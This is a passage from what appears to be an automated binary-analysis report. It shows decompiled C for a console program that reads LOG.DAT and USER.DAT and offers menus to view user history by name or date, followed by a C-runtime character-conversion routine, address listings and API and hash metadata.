							E00D870FC(_t314, _t397, _t421, __eflags);
							_t435 = _t446 + 4;
							E00D81250(4, 9);
							 *(_t433 - 8) = 0;
							while(1) {
								L55:
								__eflags =  *(_t433 - 8) - 0x46;
								if(__eflags >= 0) {
									break;
								}
								L56:
								_push(0xc4);
								_push("%c");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t435 = _t435 + 8;
								L54:
								_t287 = 1 +  *(_t433 - 8);
								__eflags = _t287;
								 *(_t433 - 8) = _t287;
							}
							L57:
							__eflags =  *(_t433 - 0x34);
							if( *(_t433 - 0x34) != 0) {
								L58:
								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
								while(1) {
									L60:
									__eflags =  *(_t433 - 8);
									if( *(_t433 - 8) < 0) {
										break;
									}
									L61:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L59:
									_t371 =  *(_t433 - 8) - 1;
									__eflags = _t371;
									 *(_t433 - 8) = _t371;
								}
								L62:
								 *(_t433 - 8) = 0;
								while(1) {
									L64:
									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
										goto L66;
									}
									L65:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L63:
									_t283 = 1 +  *(_t433 - 8);
									__eflags = _t283;
									 *(_t433 - 8) = _t283;
								}
							}
							L66:
							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
							L68:
							 *(_t433 - 8) =  *(_t433 - 0x1c);
							 *(_t433 - 0xc) = 0;
							L69:
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if(__eflags < 0) {
							}
							goto L75;
						}
						L82:
						_t249 =  *((char*)(_t433 - 1));
						__eflags = _t249 - 0x73;
						if(__eflags == 0) {
							goto L50;
						}
						L83:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if(__eflags == 0) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							__eflags = 1;
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t433 - 8) = 0;
							 *(_t433 - 0x28) = 0;
							 *(_t433 - 0x1c) = 0;
							 *(_t433 - 0x34) = 0;
							_t218 = E00D86E91("LOG.DAT", "r");
							_t436 = _t435 + 8;
							 *0xda2f20 = _t218;
							while(1) {
								L2:
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
								_t320 =  *0xda2f20; // 0x0
								_t228 = E00D86FC1(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
								_t437 = _t436 + 0x18;
								if(_t228 == 0xffffffff) {
									break;
								}
								L3:
								_t307 = E00D86E91("USER.DAT", "r");
								_t450 = _t437 + 8;
								 *0xda2f28 = _t307;
								while(1) {
									L4:
									_push(_t433 - 0x78);
									_push(_t433 - 0x58);
									_t394 =  *0xda2f28; // 0x0
									_t309 = E00D86FC1(_t394, "%s %s %s\n", _t433 - 0x38);
									_t451 = _t450 + 0x14;
									if(_t309 == 0xffffffff) {
										break;
									}
									L5:
									_t313 = E00D881D0( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
									_t450 = _t451 + 8;
									if(_t313 == 0) {
										 *(_t433 - 8) = 1 +  *(_t433 - 8);
									}
								}
								L8:
								_t310 =  *0xda2f28; // 0x0
								_push(_t310);
								E00D86D56(_t314, _t397, _t421, __eflags);
								_t436 = _t451 + 4;
							}
							L9:
							 *(_t433 - 0x30) =  *(_t433 - 8);
							_t364 =  *0xda2f20; // 0x0
							_push(_t364);
							E00D86D56(_t314, _t397, _t421, __eflags);
							E00D82080( *(_t433 - 8), _t397, _t421, __eflags, _t457);
							E00D81250(0x1e, 8);
							_push("1. View by USER NAME");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xa);
							_push("2. View by DATE");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xc);
							_push("3. View ALL User history");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xe);
							_push("4. Return to main menu");
							E00D870FC(_t314, _t397, _t421, __eflags);
							_t442 = _t437 + 0x14;
							E00D81250(1, 0xf);
							 *(_t433 - 8) = 0;
							while(1) {
								L11:
								__eflags =  *(_t433 - 8) - 0x4e;
								if(__eflags >= 0) {
									break;
								}
								L12:
								_push("_");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t442 = _t442 + 4;
								_t306 = 1 +  *(_t433 - 8);
								__eflags = _t306;
								 *(_t433 - 8) = _t306;
							}
							L13:
							E00D81250(0x17, 0x11);
							_push(" Press a number between the range [1 -4]  ");
							E00D870FC(_t314, _t397, _t421, __eflags);
							_t443 = _t442 + 4;
							 *(_t433 - 0xc) = 0;
							_t322 =  *(_t433 - 0xc);
							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
							E00D82080( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
							__eflags =  *(_t433 - 0x20) - 3;
							if(__eflags > 0) {
								L38:
								E00D82080(_t322, _t397, _t421, __eflags, _t457);
								E00D81250(0xa, 0xa);
								_push("Your input is out of range! Enter a choice between 1 to 4!");
								E00D870FC(_t314, _t397, _t421, __eflags);
								E00D81250(0xf, 0xc);
								_push("Press ENTER to return to main menu...");
								_t249 = E00D870FC(_t314, _t397, _t421, __eflags);
								_t435 = _t443 + 8;
								 *(_t433 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M00D83598))) {
									case 0:
										L15:
										E00D81250(0x1e, 0xa);
										_push("Enter user name : ");
										E00D870FC(_t314, _t397, _t421, __eflags);
										_t365 = _t433 - 0x58;
										_t249 = E00D8732B(" %s", _t433 - 0x58);
										_t435 = _t443 + 0xc;
										 *(_t433 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
												break;
											}
											L18:
											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
											_t299 = E00D881D0( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
											_t435 = _t435 + 8;
											__eflags = _t299;
											if(_t299 == 0) {
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t303 = 1 +  *(_t433 - 0xc);
												__eflags = _t303;
												 *(_t433 - 0xc) = _t303;
											}
											_t249 = 1 +  *(_t433 - 8);
											__eflags = _t249;
											 *(_t433 - 8) = _t249;
										}
										L21:
										_t322 =  *(_t433 - 0xc);
										 *(_t433 - 0x14) =  *(_t433 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											__eax = E00D81250(0x1e, 0xa);
											_push("Enter Date (dd/mm/yyyy) : ");
											__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
											__esp = __esp + 4;
											__edx = __ebp - 0x58;
											E00D8732B(" %s", __ebp - 0x58) = __ebp - 0x58;
											__eflags = E00D81E00(__eflags, __ebp - 0x58);
											if(__eflags == 0) {
												__eax = E00D814A0(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
												_push(0xd9f8b0);
												__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
												__esp = __esp + 4;
											}
											__ecx = __ebp - 0x58;
											__eflags = E00D81E00(__eflags, __ebp - 0x58);
										} while (__eflags == 0);
										__edx = __ebp - 0x58;
										_push(__ebp - 0x58);
										__eax = E00D81570();
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x18);
											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
											__eax = E00D881D0( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
												__edi = __esi + __ecx;
												__edi = __esi + __ecx + __ecx;
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t433 - 0x14);
										if(__eflags == 0) {
											E00D82080(_t322, _t397, _t421, __eflags, _t457);
											E00D81250(0x1b, 0xc);
											_push(0xd9f918);
											E00D870FC(_t314, _t397, _t421, __eflags);
											_t435 = _t435 + 4;
											_t249 = E00D82E20(_t314, _t365, __eflags, _t457);
										}
										__eflags =  *(_t433 - 0x28);
										if( *(_t433 - 0x28) != 0) {
											L85:
											 *(_t433 - 0x28) = 0;
										} else {
											L42:
											 *(_t433 - 8) = 0;
											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
											while(1) {
												L44:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
													break;
												}
												L45:
												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t322 = 1 +  *(_t433 - 8);
												 *(_t433 - 8) = 1 +  *(_t433 - 8);
												_t391 =  *(_t433 - 0xc) - 1;
												__eflags = _t391;
												 *(_t433 - 0xc) = _t391;
											}
											L46:
											 *(_t433 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if(__eflags >= 0) {
													goto L50;
												}
												L49:
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												L47:
												_t322 = 1 +  *(_t433 - 8);
												__eflags = _t322;
												 *(_t433 - 8) = _t322;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t249;
						L88:
					}
				}
			}

































                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d8341b
                                              0x00d83421
                                              0x00d8342a
                                              0x00d8342d
                                              0x00d8342d
                                              0x00d83430
                                              0x00d83433
                                              0x00d83433
                                              0x00d83439
                                              0x00d83442
                                              0x00d8344d
                                              0x00d8344e
                                              0x00d83453
                                              0x00d8346c
                                              0x00d83482
                                              0x00d83490
                                              0x00d83495
                                              0x00d8349a
                                              0x00d8349d
                                              0x00d834a0
                                              0x00d834a5
                                              0x00d834a5
                                              0x00d834ab
                                              0x00d834af
                                              0x00d834b0
                                              0x00d834b0
                                              0x00d834b5
                                              0x00d834be
                                              0x00d834cc
                                              0x00d834d0
                                              0x00d834da
                                              0x00d834de
                                              0x00d834e8
                                              0x00d834ec
                                              0x00d834f6
                                              0x00d834fa
                                              0x00d834fb
                                              0x00d83500
                                              0x00d83505
                                              0x00d8350e
                                              0x00d83511
                                              0x00d8351e
                                              0x00000000
                                              0x00d83513
                                              0x00d83513
                                              0x00d83519
                                              0x00d83519
                                              0x00d83523
                                              0x00d83523
                                              0x00d83527
                                              0x00d8352a
                                              0x00d83535
                                              0x00d83535
                                              0x00d8352c
                                              0x00d8352c
                                              0x00d83530
                                              0x00d83533
                                              0x00000000
                                              0x00000000
                                              0x00d83533
                                              0x00d8353c
                                              0x00d83540
                                              0x00d83543
                                              0x00d83545
                                              0x00d83548
                                              0x00d8354b
                                              0x00d8354d
                                              0x00d8354d
                                              0x00d8354b
                                              0x00d83554
                                              0x00d83558
                                              0x00d8355b
                                              0x00d83301
                                              0x00d83301
                                              0x00d83306
                                              0x00d8330a
                                              0x00d83328
                                              0x00d8332d
                                              0x00d83332
                                              0x00d83337
                                              0x00d8330c
                                              0x00d83310
                                              0x00d83315
                                              0x00d8331a
                                              0x00d8331f
                                              0x00d8331f
                                              0x00d8333a
                                              0x00d8333e
                                              0x00d83343
                                              0x00d83348
                                              0x00d8334d
                                              0x00d83354
                                              0x00d83359
                                              0x00d8336b
                                              0x00d8336b
                                              0x00d8336b
                                              0x00d8336f
                                              0x00000000
                                              0x00000000
                                              0x00d83371
                                              0x00d83371
                                              0x00d83376
                                              0x00d8337b
                                              0x00d83380
                                              0x00d83362
                                              0x00d83365
                                              0x00d83365
                                              0x00d83368
                                              0x00d83368
                                              0x00d83385
                                              0x00d83385
                                              0x00d83389
                                              0x00d8338b
                                              0x00d83391
                                              0x00d8339f
                                              0x00d8339f
                                              0x00d8339f
                                              0x00d833a3
                                              0x00000000
                                              0x00000000
                                              0x00d833a5
                                              0x00d833ab
                                              0x00d833c2
                                              0x00d833c2
                                              0x00d833c2
                                              0x00d833c4
                                              0x00d83396
                                              0x00d83399
                                              0x00d83399
                                              0x00d8339c
                                              0x00d8339c
                                              0x00d833c7
                                              0x00d833c7
                                              0x00d833d9
                                              0x00d833d9
                                              0x00d833dc
                                              0x00d833df
                                              0x00000000
                                              0x00000000
                                              0x00d833e1
                                              0x00d833e7
                                              0x00d833f8
                                              0x00d833f8
                                              0x00d833f8
                                              0x00d833fa
                                              0x00d833d0
                                              0x00d833d3
                                              0x00d833d3
                                              0x00d833d6
                                              0x00d833d6
                                              0x00d833d9
                                              0x00d833fd
                                              0x00d83400
                                              0x00d83403
                                              0x00d83405
                                              0x00d83405
                                              0x00d8340c
                                              0x00d8340f
                                              0x00d83412
                                              0x00d8342d
                                              0x00d83430
                                              0x00d83433
                                              0x00d83433
                                              0x00000000
                                              0x00d83433
                                              0x00d83561
                                              0x00d83561
                                              0x00d83565
                                              0x00d83568
                                              0x00000000
                                              0x00000000
                                              0x00d8356e
                                              0x00d8356e
                                              0x00d83572
                                              0x00d83575
                                              0x00000000
                                              0x00000000
                                              0x00d8357b
                                              0x00d83584
                                              0x00d83584
                                              0x00d83589
                                              0x00d8358b
                                              0x00000000
                                              0x00000000
                                              0x00d82e89
                                              0x00d82e89
                                              0x00d82e90
                                              0x00d82e97
                                              0x00d82e9e
                                              0x00d82eaf
                                              0x00d82eb4
                                              0x00d82eb7
                                              0x00d82ebc
                                              0x00d82ebc
                                              0x00d82ec9
                                              0x00d82ed7
                                              0x00d82ee5
                                              0x00d82ef5
                                              0x00d82efc
                                              0x00d82f01
                                              0x00d82f07
                                              0x00000000
                                              0x00000000
                                              0x00d82f09
                                              0x00d82f13
                                              0x00d82f18
                                              0x00d82f1b
                                              0x00d82f20
                                              0x00d82f20
                                              0x00d82f23
                                              0x00d82f27
                                              0x00d82f31
                                              0x00d82f38
                                              0x00d82f3d
                                              0x00d82f43
                                              0x00000000
                                              0x00000000
                                              0x00d82f45
                                              0x00d82f53
                                              0x00d82f58
                                              0x00d82f5d
                                              0x00d82f65
                                              0x00d82f65
                                              0x00d82f68
                                              0x00d82f6a
                                              0x00d82f6a
                                              0x00d82f6f
                                              0x00d82f70
                                              0x00d82f75
                                              0x00d82f75
                                              0x00d82f7d
                                              0x00d82f80
                                              0x00d82f83
                                              0x00d82f89
                                              0x00d82f8a
                                              0x00d82f92
                                              0x00d82f9b
                                              0x00d82fa0
                                              0x00d82fa5
                                              0x00d82fb1
                                              0x00d82fb6
                                              0x00d82fbb
                                              0x00d82fc7
                                              0x00d82fcc
                                              0x00d82fd1
                                              0x00d82fdd
                                              0x00d82fe2
                                              0x00d82fe7
                                              0x00d82fec
                                              0x00d82ff3
                                              0x00d82ff8
                                              0x00d8300a
                                              0x00d8300a
                                              0x00d8300a
                                              0x00d8300e
                                              0x00000000
                                              0x00000000
                                              0x00d83010
                                              0x00d83010
                                              0x00d83015
                                              0x00d8301a
                                              0x00d83004
                                              0x00d83004
                                              0x00d83007
                                              0x00d83007
                                              0x00d8301f
                                              0x00d83023
                                              0x00d83028
                                              0x00d8302d
                                              0x00d83032
                                              0x00d83035
                                              0x00d8303c
                                              0x00d8303f
                                              0x00d83042
                                              0x00d8304b
                                              0x00d83054
                                              0x00d83057
                                              0x00d8305b
                                              0x00d8321b
                                              0x00d8321b
                                              0x00d83224
                                              0x00d83229
                                              0x00d8322e
                                              0x00d8323a
                                              0x00d8323f
                                              0x00d83244
                                              0x00d83249
                                              0x00d8324c
                                              0x00000000
                                              0x00d83061
                                              0x00d83061
                                              0x00d83064
                                              0x00000000
                                              0x00d8306b
                                              0x00d8306f
                                              0x00d83074
                                              0x00d83079
                                              0x00d83081
                                              0x00d8308a
                                              0x00d8308f
                                              0x00d83092
                                              0x00d830a4
                                              0x00d830a4
                                              0x00d830a7
                                              0x00d830aa
                                              0x00000000
                                              0x00000000
                                              0x00d830ac
                                              0x00d830b9
                                              0x00d830be
                                              0x00d830c3
                                              0x00d830c6
                                              0x00d830c8
                                              0x00d830d0
                                              0x00d830e1
                                              0x00d830e1
                                              0x00d830e1
                                              0x00d830e3
                                              0x00d830e7
                                              0x00d830e7
                                              0x00d830ea
                                              0x00d830ea
                                              0x00d8309e
                                              0x00d8309e
                                              0x00d830a1
                                              0x00d830a1
                                              0x00d830ef
                                              0x00d830ef
                                              0x00d830f2
                                              0x00000000
                                              0x00000000
                                              0x00d830fa
                                              0x00d830fa
                                              0x00d830fe
                                              0x00d83103
                                              0x00d83108
                                              0x00d8310d
                                              0x00d83110
                                              0x00d83121
                                              0x00d8312a
                                              0x00d8312c
                                              0x00d83136
                                              0x00d8313b
                                              0x00d83140
                                              0x00d83145
                                              0x00d83145
                                              0x00d83148
                                              0x00d83151
                                              0x00d83151
                                              0x00d83155
                                              0x00d83158
                                              0x00d83159
                                              0x00d8315e
                                              0x00d83165
                                              0x00d83177
                                              0x00d83177
                                              0x00d83177
                                              0x00d8317a
                                              0x00d8317d
                                              0x00000000
                                              0x00000000
                                              0x00d8317f
                                              0x00d8317f
                                              0x00d83186
                                              0x00d83189
                                              0x00d8318c
                                              0x00d83191
                                              0x00d83199
                                              0x00d8319b
                                              0x00d831a0
                                              0x00d831a3
                                              0x00d831a9
                                              0x00d831ac
                                              0x00d831af
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b4
                                              0x00d831b6
                                              0x00d831b7
                                              0x00d831ba
                                              0x00d831ba
                                              0x00d831bd
                                              0x00d831bd
                                              0x00d8316e
                                              0x00d83171
                                              0x00d83171
                                              0x00d83174
                                              0x00d83174
                                              0x00d831c2
                                              0x00d831c2
                                              0x00d831c5
                                              0x00000000
                                              0x00000000
                                              0x00d831cd
                                              0x00d831cd
                                              0x00d831df
                                              0x00d831df
                                              0x00d831df
                                              0x00d831e2
                                              0x00d831e5
                                              0x00000000
                                              0x00000000
                                              0x00d831e7
                                              0x00d831ea
                                              0x00d831ed
                                              0x00d831f3
                                              0x00d831f6
                                              0x00d831f9
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d831fe
                                              0x00d83200
                                              0x00d83201
                                              0x00d83204
                                              0x00d83207
                                              0x00d831d6
                                              0x00d831d9
                                              0x00d831d9
                                              0x00d831dc
                                              0x00d831dc
                                              0x00d8320c
                                              0x00d8320c
                                              0x00d8320f
                                              0x00d83253
                                              0x00d83253
                                              0x00d83257
                                              0x00d83259
                                              0x00d83262
                                              0x00d83267
                                              0x00d8326c
                                              0x00d83271
                                              0x00d83274
                                              0x00d83274
                                              0x00d83279
                                              0x00d8327d
                                              0x00d8357d
                                              0x00d8357d
                                              0x00d83283
                                              0x00d83283
                                              0x00d83283
                                              0x00d83290
                                              0x00d832a7
                                              0x00d832a7
                                              0x00d832aa
                                              0x00d832ad
                                              0x00000000
                                              0x00000000
                                              0x00d832af
                                              0x00d832b5
                                              0x00d832c6
                                              0x00d832c6
                                              0x00d832c6
                                              0x00d832c8
                                              0x00d83298
                                              0x00d8329b
                                              0x00d832a1
                                              0x00d832a1
                                              0x00d832a4
                                              0x00d832a4
                                              0x00d832cb
                                              0x00d832cb
                                              0x00d832dd
                                              0x00d832dd
                                              0x00d832e0
                                              0x00d832e3
                                              0x00000000
                                              0x00000000
                                              0x00d832e5
                                              0x00d832eb
                                              0x00d832fc
                                              0x00d832fc
                                              0x00d832fc
                                              0x00d832fe
                                              0x00d832d4
                                              0x00d832d7
                                              0x00d832d7
                                              0x00d832da
                                              0x00d832da
                                              0x00000000
                                              0x00d832dd
                                              0x00000000
                                              0x00000000
                                              0x00d83214
                                              0x00000000
                                              0x00000000
                                              0x00d83064
                                              0x00000000
                                              0x00d8305b
                                              0x00d83591
                                              0x00d83596
                                              0x00000000
                                              0x00d83596
                                              0x00d8342d

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D83453
                                              • _wprintf.LIBCMT ref: 00D83500
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition
                                              • String ID: %d.$%s%s%s%s
                                              • API String ID: 3459578117-4028964860
                                              • Opcode ID: 7fa3c1019b1153e5c8653d0b8562e84d6e45fc3c2bb956a354ea50f2f1e45f52
                                              • Instruction ID: 1c782eac3633d62c8cd7f9f2cec714bd71402168c06191b0f68d1d6aff4a75cb
                                              • Opcode Fuzzy Hash: 7fa3c1019b1153e5c8653d0b8562e84d6e45fc3c2bb956a354ea50f2f1e45f52
                                              • Instruction Fuzzy Hash: 93419071E0404AAFCF18DB84D4D1BBEBB76EF91708F598199D015AB245DB30EA45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D91613, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E00D91613(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				void* __edi;
				signed int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				void* _t57;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					_push(_t57);
					E00D877F7( &_v20, _t57, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00D911EB( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x20432f41
							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00D88E9F(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x3a202020
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x3a202020
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x3a202020
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x3a202020
						_t18 = _t59 + 4; // 0x20432f41
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                              0x00d9161b
                                              0x00d91620
                                              0x00d9163a
                                              0x00000000
                                              0x00d9163a
                                              0x00d91622
                                              0x00d91627
                                              0x00000000
                                              0x00000000
                                              0x00d9162c
                                              0x00d91640
                                              0x00d91647
                                              0x00d9164c
                                              0x00d9164f
                                              0x00d91656
                                              0x00d91675
                                              0x00d9167c
                                              0x00d9167e
                                              0x00d916c2
                                              0x00d916ca
                                              0x00d916d6
                                              0x00d916df
                                              0x00d916e1
                                              0x00d916f1
                                              0x00d916f1
                                              0x00d916f5
                                              0x00d916f7
                                              0x00d916fa
                                              0x00d916fa
                                              0x00d916fa
                                              0x00d916fa
                                              0x00000000
                                              0x00d91700
                                              0x00d916e3
                                              0x00d916e3
                                              0x00d916e8
                                              0x00d916e8
                                              0x00d916eb
                                              0x00000000
                                              0x00d916eb
                                              0x00d91680
                                              0x00d91683
                                              0x00d91687
                                              0x00d916b0
                                              0x00d916b0
                                              0x00d916b0
                                              0x00d916b3
                                              0x00d916b3
                                              0x00000000
                                              0x00000000
                                              0x00d916b5
                                              0x00d916b9
                                              0x00000000
